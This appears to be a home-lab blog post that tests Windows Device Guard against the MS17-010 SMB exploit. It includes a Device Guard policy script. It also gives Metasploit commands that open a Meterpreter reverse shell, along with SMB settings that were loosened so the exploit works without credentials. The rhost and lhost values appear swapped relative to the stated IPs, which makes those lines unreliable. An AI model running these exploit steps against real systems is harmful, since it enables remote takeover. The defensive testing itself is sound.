Device Guard vs RCE

 

Applocker failed to prevent a Remote Code Exploit (here), so lets see if Device Guard does any better...

The tests will be carried out in isolation, all other security protections will be disabled. The only service protecting Windows from being pillaged is Device Guard. Microsoft seem to be going out of their way to prevent RCE's executing against Windows 10. After a few days of research and trialing, the only remote exploit that successfully works without requiring credentials is Windows 10 1511 using MS17-010. Slightly disappointing as I was hoping to use 2020-0796 and 1903 or 1909. 2020-0796 is still POC and with my setup it appears to produce lots of BSoD.  

Using Windows 10 1511 is a bit of a concern as Device Guard is upgraded with Windows 10 1703 (Creators). RCE's maybe able to bypass 1511 but not 1703 and onwards, but the test wouldn't reflect that. 

The attacker is Kali on 192.168.0.65 running MS17_010_PSExec

The victim is Window 10 x64 1511 on 192.168.0.15 running on Asus Zenbook 301 

To exploit using MS17_010_PSExec without providing credentials:

'Restrict anonymous access to names pipes and shares' was disabled

'Shares that can be accessed anonymously' has Admin$ added

In Kali start 'msfconsole'

use exploit/windows/smb/ms17_010_psexec

set rhost 192.168.0.65

set lhost 192.168.0.15

set payload/windows/meterpreter/reverse_tcp

exploit

To easy and the now the proud owner of the Zenbook.

Device Guard has the following requirements:

 

Hardware Requirements

UEFI Native Mode
Windows 10/2016 x64
SLAT and Virtualization Extensions (Intel VT or AMD V)
TPM

Windows Features

Windows Defender Application Guard (Isolation mode prior to 1703)


Hyper-V Platform (Not required after 1603)

Hyper-V Hypervisor

GPO Settings

Computer Configuration > Administrative Templates > System > Device Guard

Turn on Virtualization Based Security (enable)

Secure Boot and DMA Protection

Enable Virtualization Based Protection of Code

Deploy Code Integrity Policy (enable)

C:\DeviceGuard\SIPolicy.p7b 

(C:\DeviceGuard\SIPolicy.p7b is automatically copied and converted to C:\Windows\System32\Codeintegrity\)

To force the conversion run the following: Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\DeviceGuard\SIPolicy.p7b"}


The system will create SIPolicy.p7b and a reboot will enforce Device Guard

<#
.Synopsis

.Description

.Version
#>

#Enable required Hypervisor feature 

 #Enable all features and then remove unwanted. Unable to add Hyper-V Hypervisor as Hyper-V platform is required
 Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Tools-All -NoRestart
Disable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-Services -NoRestart

#Sets Working Folder for DG
$CIPolicyPath = "C:\DeviceGuard"

#C:\DeviceGuard\InitalScan.xml 
$IntialCIPolicy = $CIPolicyPath+"\initialScan.xml"

#C:\DeviceGuard\SIPolicy.p7b

$CIPolicyBin = $CIPolicyPath+"\SIPolicy.p7b"

#C:\DeviceGuard\CIPolicy.txt - Output from initial policy audit
$CIPolicyError = $CIPolicyPath+"\CIPolicy.txt"

#Creates SIPolicy.p7b based on the IntialCIPolicy.xml
New-CIPolicy -Level FilePublisher -Fallback Hash -FilePath $IntialCIPolicy -UserPEs 3> $CIPolicyError

#Enforces UMCI
Set-RuleOption -FilePath $IntialCIPolicy  -Option 0
    

#Enforcement Mode enabled
Set-RuleOption -FilePath $IntialCIPolicy  -Option 3 -delete

#Converts the faudit to a p7b file copies to C:\DeviceGuard\

#GPO is set to move SIPolicy.p7b to C:\Windows\System32\CodeIntegrity
ConvertFrom-CIPolicy -XmlFilePath $IntialCIPolicy  -BinaryFilePath $CIPolicyBin 

#Applies DG policy without a reboot
Invoke-CimMethod -Namespace root/Microsoft/Windows/CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName update -Arguments @{filepath = "C:\Windows\System32\CodeIntegrity\SIPolicy.p7b"}

The script can be downloaded from Github (here).

Run GPUpdate and reboot

To test Device Guard I attempted to run putty.exe and a few other applications, any exe not present during the audit wouldn't successfully run.

The CodeIntegrity Eventlogs reported that the programs were not approved

And now for the Remote Code Exploit..........

The good news is that Device Guard prevented the exploit on repeated attempts, that's a good day at the office, system is safe and attacker frustrated.